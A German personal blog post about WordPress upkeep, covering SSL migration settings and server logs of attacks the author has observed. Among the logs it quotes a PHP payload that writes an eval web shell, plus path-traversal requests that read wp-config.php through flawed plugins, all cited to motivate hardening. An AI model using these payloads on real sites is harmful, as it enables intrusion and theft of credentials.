Mal eben schnell WordPress auf SSL migrieren

und plötzlich geht gar nix mehr.

Dann hilf ein Backup der Datenbank, ein Backup der Installation,
die Plugins Duplicator oder Better Search and Replace

weiterhin:
SHIFT-STRG-ENF im Firefox um schnell Cookies und Cache zu löschen, um nicht jedesmal in die doofen Settings wechseln zu müssen.

wp-config.php editieren und


define('FORCE_SSL_ADMIN', true);
define( 'WP_DEBUG', true );
define( 'WP_DEBUG_DISPLAY', false );
define( 'WP_DEBUG_LOG', true );
define('WP_HOME','https://www.domain.de'); //<-- NO TRAILING /
define('WP_SITEURL','https://www.domain.de');

und quasi als aller erstes

* @package WordPress
*/
if ($_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') $_SERVER['HTTPS']='on';

sollte auch dann stehen bleiben

Und der Ar.. ist gerettet

Hilfreich ist auch bei 1und1 das RewriteBase / zu entfernen, wenn SSL erzwungen werden soll

Ein Rootverzeichnis sollte aufgeräumt sein

Ich habe es ja schon mehrfach geschrieben, aber da das hier fast täglich passiert noch mal der Hinweis.

Ein Rootverzeichnis sollte aufgeräumt sein, umbenennen funktioniert nicht


//e-world.de/wp-config.htm
//e-world.de/wp-config.html
//e-world.de/wp-config.local.php
//e-world.de/wp-config.prod.php.txt
//e-world.de/wp-config-sample.php~
//e-world.de/config.php~~
//e-world.de/wp-config.cfg
//e-world.de/wp-config%0
//e-world.de/config.
//e-world.de/wp-config.backup
//e-world.de/wp-config.data
//e-world.de/config.php~
//www.e-world.de/config.old
//e-world.de/config.old
//www.e-world.de/config.bak
//e-world.de/config.bak
//www.e-world.de/wp-config-backup
//e-world.de/wp-config-backup
//e-world.de/wp-config-backup.txt
//www.e-world.de/wp-config.
//e-world.de/wp-config.
//www.e-world.de/config
//e-world.de/config
//www.e-world.de/wp-config.old
//e-world.de/wp-config.old
//www.e-world.de/wp-config.txt
//e-world.de/wp-config.txt
//www.e-world.de/wp-config.bak
//e-world.de/wp-config.bak
//www.e-world.de/wp-config%0fix.txt
//e-world.de/wp-config%0fix.txt
//www.e-world.de/wp-config-backup.txt
//e-world.de/wp-config-backup.txt

Verdächtige Dateien

Falls jemand u.g. Dateien in seinem System findet, dann wurde eine Backdoor platziert.

cilik.php
jahat.php
fatal.php
budak.php
demit.php
reload-x.pHp
.libs.php
406.php
wp-linknet.php
magic.php
indo.php
indeks.php
ramz.pHp
xGSx.php
bogel.php
myluph.php
polahi.php

Viele Angriffe probieren immer wieder auf diese oder ähnliche Dateien zuzugreifen.

So nach dem Motto, evtl hat ja schon jemand geschafft. Also, guter Rat, sichert euer System ab, so gut es eben geht. Wenn auch ein 100% Schutz meiner Meinung nach kaum möglich ist.

Upload Attacke

Hier versucht der Angreifer auf meinen Server hochzuladen. Eine Sekunde später wird sofort probiert, ob die hochgeladene Datei abgerufen werden kann.

xxx.xxx.xxx.xxx - - [] "POST / HTTP/1.1" 403 226 www.e-world.de "http://www.e-world.de/" "Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0" "-"
xxx.xxx.xxx.xxx - - [] "GET /wp-content/uploads/wpconf.php HTTP/1.1" 404 - www.e-world.de "http://www.googlebot.com/bot.html" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"

xxx.xxx.xxx.xxx - - [] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 226 www.e-world.de "http://www.e-world.de/wp-admin/admin-ajax.php" "Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0" "-"
xxx.xxx.xxx.xxx - - [] "GET /wp-content/plugins/revslider/temp/update_extract/wpconf.php HTTP/1.1" 503 1363 www.e-world.de "http://www.googlebot.com/bot.html" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"

xxx.xxx.xxx.xxx - - [] "POST /sites/all/libraries/elfinder/php/connector.minimal.php HTTP/1.1" 403 226 www.e-world.de "http://www.e-world.de/sites/all/libraries/elfinder/php/connector.minimal.php" "Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0" "-"
xxx.xxx.xxx.xxx - - [] "GET /sites/all/libraries/elfinder/files/wpconf.php HTTP/1.1" 404 13534 www.e-world.de "http://www.googlebot.com/bot.html" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"

Versuch Download einer Backupdatei als Angriffsvektor

Hier probiert ein Hacker, ob nicht irgendwo eine Backupdatei rumliegt, in der Hoffnung so mehr Infos über mögliche Schwachstellen zu bekommen, bzw. Zugangsdaten


tried to access non-existent page http://www.e-world.de/e-worldbak.rar

tried to access non-existent page http://www.e-world.de/e-world.zip

tried to access non-existent page http://www.e-world.de/e-world.rar

tried to access non-existent page http://www.e-world.de/e-world.de.zip

tried to access non-existent page http://www.e-world.de/e-world.de.rar

tried to access non-existent page http://www.e-world.de/www.e-world.de.zip

tried to access non-existent page http://www.e-world.de/www.e-world.de.rar

tried to access non-existent page http://www.e-world.de/wwwe-worldde.zip

tried to access non-existent page http://www.e-world.de/wwwe-worldde.rar

tried to access non-existent page http://www.e-world.de/e-worldweb.zip

tried to access non-existent page http://www.e-world.de/e-worldweb.rar

tried to access non-existent page http://www.e-world.de/e-worldwww.zip

tried to access non-existent page http://www.e-world.de/e-worldwww.rar

tried to access non-existent page http://www.e-world.de/e-worldwwwroot.zip

tried to access non-existent page http://www.e-world.de/e-worldwwwroot.rar

tried to access non-existent page http://www.e-world.de/e-worlde-world.zip

tried to access non-existent page http://www.e-world.de/e-worlde-world.rar

tried to access non-existent page http://www.e-world.de/e-world.dee-world.de.zip

tried to access non-existent page http://www.e-world.de/e-world.dee-world.de.rar

tried to access non-existent page http://www.e-world.de/www.e-world.dewww.e-world.de.zip

tried to access non-existent page http://www.e-world.de/www.e-world.dewww.e-world.de.rar

Angriffe mit wechselnder IP

Hier ist nett zu sehen, wie der Angreifer permanent die IP Adresse ändert. Was allerdings immer gleich bleibt ist die Browser Kennung und die Angriffe habe fast alle das gleiche Muster
hello.php?irgendwas und kommen im Sekundentakt.


Ukraine left http://e-world.de/wp-includes/pomo/so.php?450799
16.2.2016 21:45:15 (2 days 12 hours ago)   IP: 93.75.150.235 [block]  Hostname: 93.75.150.235
Browser: IE version 6.0 running on Win32
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Argentina Caleta Olivia, Argentina left http://e-world.de/wp-admin/maint/hello.php?module
16.2.2016 21:45:11 (2 days 12 hours ago)   IP: 181.118.202.48 [block]  Hostname: host202-048.cvci.com.ar
Browser: IE version 6.0 running on Win32
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)


Azerbaijan Baku, Azerbaijan left http://e-world.de/wp-content/plugins/hello.php?module
16.2.2016 21:45:10 (2 days 12 hours ago)   IP: 5.10.242.203 [block]  Hostname: vlan242-203.azeronline.com
Browser: IE version 6.0 running on Win32
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Republic of Korea Seongnam-si, Republic of Korea left http://e-world.de/wp-content/plugins/hello.php?450799/hello.php?450799
16.2.2016 21:45:10 (2 days 12 hours ago)   IP: 221.153.117.245 [block]  Hostname: 221.153.117.245
Browser: IE version 6.0 running on Win32
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Turkey Konya, Turkey left http://e-world.de/wp-admin/includes/rss.php?450799
16.2.2016 21:45:08 (2 days 12 hours ago)   IP: 78.162.58.130 [block]  Hostname: 78.162.58.130.dynamic.ttnet.com.tr
Browser: IE version 6.0 running on Win32
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Pakistan Lahore, Pakistan left http://e-world.de/wp-admin/maint/hello.php?450799
16.2.2016 21:45:08 (2 days 12 hours ago)   IP: 202.142.166.2 [block]  Hostname: 202-142-166-2.multi.net.pk
Browser: IE version 6.0 running on Win32
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Ukraine Dnipropetrovsk, Ukraine left http://e-world.de/wp-content/themes/hello.php?450799
16.2.2016 21:45:08 (2 days 12 hours ago)   IP: 46.98.77.193 [block]  Hostname: 193.77.PPPoE.fregat.ua
Browser: IE version 6.0 running on Win32
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Tunisia Tunisia left http://e-world.de/wp-includes/pomo/hello.php?450799
16.2.2016 21:45:07 (2 days 12 hours ago)   IP: 41.225.63.23 [block]  Hostname: 41.225.63.23
Browser: IE version 6.0 running on Win32
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Kazakhstan Karagandy, Kazakhstan left http://e-world.de/wp-content/themes/hello.php?module
16.2.2016 21:45:07 (2 days 12 hours ago)   IP: 178.89.163.197 [block]  Hostname: 178.89.163.197.megaline.telecom.kz
Browser: IE version 6.0 running on Win32
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Russia Saratov, Russia left http://e-world.de/wp-includes/Text/Tiff.php?450799
16.2.2016 21:45:06 (2 days 12 hours ago)   IP: 217.23.74.162 [block]  Hostname: pppoe-217-23-74-162-fix-srv.volgaline.ru
Browser: IE version 6.0 running on Win32
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Angriffe auf WordPress

Mittlerweile finde ich jeden Tag Angriffe auf WordPress Installation in meinen Logfiles (auch wenn gar kein WordPress installiert ist).

Es wird einfach alles durchprobiert und das im Sekundentakt.

Da auch Dateinname in unterschiedlichsten Variante aufgerufen werden, sollte alles entfernt werden was nicht gebraucht wird.

Einfache Umbenennung ala

_index_.php

oder ähnliches gänzlich vermeiden.

Das der Admin Zugang von WordPress gesperrt sein sollte via htaccess brauche ich nicht weite erwähnen.

Hier mal ein paar Aufrufe, die ich so gefunden habe (wird ausgebaut)

//der komplette Ausdruck war url_encoded und
//der ausdruck < ? php eval($_POST[1]);? >
//wurde base64_encoded
/?1=@ini_set(„display_errors“,“0″);@set_time_limit(0);@set_magic_quotes_runtime(0);echo ‚->|‘;file_put_contents($_SERVER[‚DOCUMENT_ROOT‘].’//administrator/dbconfig.php‘,‘< ? php eval($_POST[1]); ? >‚);echo ‚|<-'; -- //anascheinend hat das Theme churchope ein sicherheitsproblem /wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php //das Plugin ACF Frontend Display /wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/index.php //Das MiwoFTP Plugin hat einen Exploit wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&item=wp-config.php&order=name&srt=yes //auch Fehler in Magento werden mal auf gerne auf einem WordPress Blog aufgerufen, weil ich mal hier was über Magento geschrieben hatte /magmi/web/magmi.php /&sa=U&ved=0ahUKEwjd6de8wd7KAhUkF6YKHZJvAi84ZBAWCJoBMBs&usg=AFQjCNFzwwjAY7taFxvrEE3M3FTt_bKllQ/magmi/web/magmi.php //Hier wird probiert eine alte Lücke in Slider Revolution Plugin aus zunutzen wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php //Auch ungenutzte Templates sollten entfernt werden /wp-content/themes/twentytwelve/page-templates/wp-index.php //acismittop scheint einen VIRUS zu enthalten oder ist ein Virus. Fast alle Seiten die ich dazu gefunden habe, haben eine Google Warnung //wp-content/plugins/acismittop/akismet.php //Auch uralte Lücken werden ausprobiert (von 2012) //wp-property/action_hooks.php In diesem Zusammenhang ist diese Seite ganz hilfreich https://www.exploit-db.com/search/?action=search&description=wordpress

WordPress Update // Browser //Serverfehler 503

Das automatische WordPress Update ist ja so eine Sache. Auf der einen Seite praktisch, da Sicherheitslöcher gefixt werden. Selbst diese vollkommen uninteressante Domain, bzw der Server werden mehrfach pro Monat angegriffen.

Allerdings habe ich beim letzten automatischen Update dann das Problem gehabt, ich kam nicht mehr ins Backend, der Server zeigte einen Fehler 503.

Normalerweise ist das ein Serverding, sprich zu gering dimensioniert, bzw ein Problem des Providers. Zu viele Domains auf dem Shared Host. Also einen Ticket beim Support gestartet. (allerdings hat der sich noch nicht bei mir gemeldet)

Gut, ich verwalte mehrere WordPressinstallation also auch dort flux ausprobiert sich einzuloggen. Alle meine 2&2 Geschichten zeigen dasselbe Problem. Immer Service Temporarily Unavailable

Nachdem ich aber probehalber einfach mal statt Firefox MS Edge und Google Chrome ausprobiert habe und mich plötzlich einloggen konnte, sah das Ganze schon anders aus.

Aber auch ein leeren des Browsercaches, des deaktivieren der Addons brachte nix. Immer der gleiche Fehler unter Firefox.

Jetzt fand ich im Netz einen Hinweis, das es bei einem anderen Provider ein Sicherheitsfeature gibt, aber 2&2 hat das anscheinend nicht. Also liegt es daran auch nicht.

Update: 2&2 nutzt doch gegen meiner ursprünglichen Aussage mod_security, sorry.

mod_security: So schützen wir WordPress, Joomla! und andere WCMS